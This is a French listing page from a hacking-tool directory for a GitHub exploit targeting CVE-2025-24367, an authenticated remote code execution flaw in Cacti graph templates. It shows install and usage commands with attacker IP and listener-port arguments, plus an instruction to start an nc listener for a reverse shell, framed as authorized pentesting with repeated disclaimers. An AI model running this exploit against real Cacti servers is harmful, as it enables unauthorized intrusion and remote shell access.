Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24367 — Exploit d'exécution de code à distance authentifiée pour la vulnérabilité du modèle de graphique Cacti, avec payload de shell inversé et prise en charge du proxy pour les tests d'intrusion autorisés. | Kitploit
Outils/GitHubGitHub/shoshinmaster/cve-2025-24367
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubshoshinmaster/cve-2025-24367

CVE-2025-24367

Exploit d'exécution de code à distance authentifiée pour la vulnérabilité du modèle de graphique Cacti, avec payload de shell inversé et prise en charge du proxy pour les tests d'intrusion autorisés.

Voir le dépôt
12il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24367 - RCE via le modèle de graphique authentifié de Cacti

Utilisation et Sécurité

Important — Lisez ceci en premier :
Ce dépôt et exploit.py sont fournis uniquement à des fins éducatives et de recherche. N'utilisez pas ce code contre des systèmes, réseaux ou services pour lesquels vous ne possédez pas une autorisation explicite et écrite. L'accès non autorisé aux systèmes informatiques est illégal et contraire à l'éthique. En utilisant ce code, vous acceptez de respecter les lois applicables et les politiques institutionnelles.


Prérequis

  • Python 3.8+
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Utilisation

root@kitploit:~
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]

Exemple

Avant d'exécuter le script, assurez-vous d'avoir un listener nc en cours d'exécution. Exécutez le script sans proxy sauf pour le débogage :

root@kitploit:~
python3 exploit.py \
  -u testuser \
  -p Welcome1 \
  -i 192.168.43.11 \
  -l 4444 \
  -url http://localhost

AVERTISSEMENTS TRÈS IMPORTANTS

  • N'exécutez pas ceci contre des systèmes de production ou tout système que vous ne possédez pas ou pour lequel vous n'avez pas d'autorisation explicite de test.
  • Obtenez toujours une autorisation écrite avant d'effectuer des tests de sécurité.
  • Utilisez des environnements de laboratoire isolés (par exemple, VMs, conteneurs ou réseaux de test dédiés) pour l'expérimentation.
  • Votre organisation peut avoir des politiques de signalement et de divulgation — respectez-les.
  • Les auteurs n'acceptent aucune responsabilité pour une mauvaise utilisation de ce code.

Rappel final : Ce script et ce README sont uniquement à des fins éducatives. N'utilisez jamais ces outils pour accéder illégalement à des systèmes.

Télécharger l’outil